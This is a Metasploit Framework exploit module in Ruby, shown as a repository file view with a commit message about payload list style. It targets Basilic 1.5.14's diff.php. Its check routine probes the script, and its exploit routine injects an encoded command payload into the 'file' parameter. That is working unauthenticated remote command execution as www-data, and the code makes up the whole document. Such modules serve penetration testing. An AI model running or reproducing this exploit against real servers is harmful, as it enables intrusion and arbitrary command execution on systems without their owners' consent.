c547e84fa7
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
107 lines
2.6 KiB
Ruby
107 lines
2.6 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
|
|
'Description' => %q{
|
|
This module abuses a metacharacter injection vulnerability in the
|
|
diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
|
|
commands as the www-data user account.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'lcashdollar',
|
|
'sinn3r',
|
|
'juan vazquez'
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '83719' ],
|
|
[ 'BID', '54234' ]
|
|
],
|
|
'Platform' => %w{ linux unix },
|
|
'Arch' => ARCH_CMD,
|
|
'Privileged' => true,
|
|
'Payload' =>
|
|
{
|
|
'DisableNops' => true,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
'RequiredCmd' => 'generic perl ruby python bash telnet'
|
|
}
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'Automatic Target', { }]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Jun 28 2012'
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def check
|
|
base = normalize_uri(target_uri.path)
|
|
|
|
sig = rand_text_alpha(10)
|
|
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri("/#{base}/Config/diff.php"),
|
|
'vars_get' => {
|
|
'file' => sig,
|
|
'new' => '1',
|
|
'old' => '2'
|
|
}
|
|
})
|
|
|
|
if res and res.code == 200 and res.body =~ /#{sig}/
|
|
return Exploit::CheckCode::Vulnerable
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
|
|
def exploit
|
|
print_status("Sending GET request...")
|
|
|
|
base = normalize_uri(target_uri.path)
|
|
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri("/#{base}/Config/diff.php"),
|
|
'vars_get' => {
|
|
'file' => "&#{payload.encoded} #",
|
|
'new' => '1',
|
|
'old' => '2'
|
|
}
|
|
})
|
|
|
|
if res and res.code == 404 then
|
|
print_error("404 Basilic not installed or possibly check URI Path.")
|
|
else
|
|
vprint_line("Server returned #{res.code}")
|
|
end
|
|
|
|
handler
|
|
end
|
|
end
|